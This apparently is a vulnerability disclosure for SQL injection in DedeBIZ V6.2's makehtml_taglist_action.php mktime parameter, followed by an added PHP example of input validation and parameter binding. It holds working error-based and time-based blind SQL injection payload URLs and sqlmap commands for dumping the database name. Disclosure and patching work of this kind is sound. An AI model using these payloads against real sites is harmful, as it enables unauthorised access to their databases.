Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND GTID_SUBSET(CONCAT(0x716b787871,(SELECT (ELT(2192=2192,1))),0x716b7a6a71),2192)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND (SELECT 9884 FROM (SELECT(SLEEP(5)))NySf)
[Suggested description]
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/DedeBIZ/DedeV6
[Affected Product Code Base]
DedeBIZ V6.2
[Affected Component]
File: /src/admin/makehtml_taglist_action.php
Parameter: mktime
python sqlmap.py -r sql.txt --current-db
[Attack Type]
Remote
[Vulnerability demonstration]
1. After logging in to the website backend as the administrator, access
http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=if(length(database())%3E0,sleep(3),1)
It is found that there is truly a delay when accessing.
payload:
http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=if(length(database())%3E0,sleep(3),1)
2. In order to improve the success rate of injection, the -r command is used here to specify the packet file for injection. Access http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1*
and use Burp Suite to capture the data package. Copy the captured data package into sql.txt in the sqlmap directory.
the captured data package:
3. Run the command
python sqlmap.py -r sql.txt --risk=3 --level=5 --current-db
in sqlmap. After the probe, it is found that there is SQL injection at parameter mktime, and the name of the current database is obtained.
[Cause of vulnerability]
In /src/admin/tags_main.php, the user can control the value of the parameter $mktime and the system does not validate the
user's input, so there is a possibility of SQL injection.
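
An added example (not DedeBIZ code, and not from the report's author) of the check that [Cause of vulnerability] says is missing: mktime is accepted only as a non-negative integer and is then bound as a typed parameter. The function names, the tag_index table, the updated_at column and the SQLite demo database are assumptions made for this example; the rejected inputs are the mktime values shown in this report.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not DedeBIZ code): accept only a non-negative integer timestamp.
function parse_mktime(mixed $raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null; // arrays (mktime[]=1) and other types are rejected
    }
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $v === false ? null : $v;
}

// Hypothetical query: table and column names are assumptions for this example.
function count_tags_since(PDO $db, int $mktime): int
{
    // The value is bound as an integer and never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT COUNT(*) FROM tag_index WHERE updated_at >= :mktime');
    $stmt->bindValue(':mktime', $mktime, PDO::PARAM_INT);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Constructed demo data in an in-memory SQLite database (the real application uses MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tag_index (id INTEGER PRIMARY KEY, updated_at INTEGER)');
$db->exec('INSERT INTO tag_index (updated_at) VALUES (100), (200), (300)');

// Constructed input list: one benign value plus the mktime values from this report.
$inputs = [
    '150',
    'if(length(database())>0,sleep(3),1)',
    '1 AND (SELECT 9884 FROM (SELECT(SLEEP(5)))NySf)',
    '1*',
];

foreach ($inputs as $raw) {
    $mktime = parse_mktime($raw);
    if ($mktime === null) {
        echo "rejected: $raw\n"; // fail closed before any query is built
        continue;
    }
    echo "accepted: $raw -> " . count_tags_since($db, $mktime) . " row(s)\n";
}
```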